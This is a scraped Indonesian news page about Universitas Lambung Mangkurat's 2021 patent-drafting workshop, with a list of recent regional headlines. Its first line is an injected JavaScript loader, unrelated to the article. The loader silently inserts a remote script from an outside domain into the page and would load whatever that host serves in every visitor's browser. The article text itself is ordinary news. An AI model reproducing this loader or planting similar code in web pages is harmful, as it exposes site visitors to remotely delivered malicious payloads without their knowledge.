(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Tingkatkan Perolehan Kekayaan Intelektual Melalui Drafting Paten ULM 2021


KANALKALIMANTAN.COM, BANJARBARU– Pusat Studi Sentra HKI Universitas Lambung Mangkurat di bawah lembaga penelitian dan pengabdian masyarakat (LPPM) memiliki tugas melaksanakan dan mengkoordinasikan kekayaan intelektual yang merupakan hasil dari kegiatan penelitian dan pengabdian masyarakat.

Guna mewujudkan hal tersebut, salah satu hal penting yang harus diwujudkan sebagai bagian dari misi sentra HKI yakni mewujudkan peningkatan kualitas SDM melalui perolehan kekayaan intelektual dari hasil penelitian dan pengabdian masyarakat.

Salah satu strategi dalam mencapai hal tersebut adalah penyelenggaraan berbagai workshop maupun lokakarya kekayaan intelektual (KI) 2021 ini. Dan dalam kegiatan rangkaian bersama lokakarya KI yaitu Drafting Paten ULM 2021.

Dalam kegiatan ini berfokus pada pemaparan dan pelatihan secara langsung dalam pembuatan draft paten sampai dengan layak untuk didaftarkan oleh Sentra HKI ke DJKI Kemenkumham Jakarta secara online.

 

Baca juga : Gelar Lokakarya Kekayaan Intelektual, ULM Dorong Para Dosen Lindungi Karya Akademik!

Dengan demikian selain workshop ini, sentra HKI dapat melakukan inventarisasi hasil penelitian dan pengabdian masyarakat yang berpotensi memperoleh kekayaan intelektual di lingkup Universitas Lambung Mangkurat.

Dwi Rasy Mujiyanti, S.Si, M.Si, selaku Ketua Panitia kegiatan mengatakan, target kegiatan ini diharapkan bisa mendaftarkan sebanyak 24 paten, 15 hak cipta dan 6 hak merek.

“Harapannya melalui lokakarya kekayaan intelektual – drafting paten ini, dapat semakin memberikan pemahaman serta mampu mendorong terciptanya berbagai kekayaan intelektual di Universitas Lambung Mangkurat yang unggul, terpercaya dan mandiri,” katanya.

Kegiatan selama dua ini mendapatkan hasil evaluasi yang baik dalam penyelenggaraan maupun narasumber yang kompeten di bidangnya masing-masing.

 

Baca juga : Jelang PSU, Haji Denny Minta Bawaslu Tak Latah Berangus Sosialisasi Tolak Politik Uang

“Hal ini tidak lepas dari dukungan dan arahan dari Ketua LPPM ULM, Prof Dr. Ir H. Danang Biyatmoko, M.Si dan sekretaris LPPM, Dr. Leila Ariyani Sofia, S.Pi.,M.P dan kinerja panitia staf LPPM dan sentra HKI,” katanya.

Sebelumnya, pada sambutan penutupan, Prof Danang menyampaikan agar pusdi Sentra HKI terus selalu konsisten dalam meningkatkan potensi KI di lingkungan ULM.

“Termasuk memberikan berbagai workshop yang lebih beragam khususnya yang berkaitan dengan komersialisasi produk KI bersama industry atau instansi lainnya,” pesannya. (Kanalkalimantan.com/kk)

Reporter : kk
Editor : cell


Desy Arfianty

Recent Posts

Hidup Makin Tenang, Hadapi Risiko dengan Asuransi Pelita dari BRI Life

KANALKALIMANTAN.COM, - Asuransi merupakan salah satu bentuk perlindungan yang perlu dimiliki setiap orang. Dengan memiliki… Read More

16 menit ago

10 Mei Hari Lupus Sedunia, Yuk Kenali Penyakit Lupus

KANALKALIMANTAN.COM - Peringatan Hari Lupus Sedunia ini diadakan pada tanggal 10 Mei setiap tahunnya. Hari… Read More

29 menit ago

Teror Buaya Muara di Pelambuan, Warga Diminta Jauhi Sungai

KANALKALIMANTAN.COM, BANJARMASIN - Buaya yang kerap muncul di Sungai Pelambuan, Kecamatan Banjarmasin Barat, Kota Banjarmasin,… Read More

56 menit ago

Satgas Distribusi Material ke Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pelaksaanan program TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-BLG di Desa… Read More

5 jam ago

Yakin ‘Pemilik’ 13 Kursi Golkar, Acil Odah Lamar Nasdem Koalisi di Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Hj Raudatul Jannah atau Acil Odah siap ramaikan kontestasi Pemilihan Kepala Daerah… Read More

7 jam ago

Musrenbang RPJPD 2025-2045, Bahas Rencana Program HSU 20 Tahun ke Depan

KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten Hulu Sungai Utara melaksanakan Musyawarah Perencanaan Pembangunan (Musrenbang) Rencana Pembangunan… Read More

7 jam ago

This website uses cookies.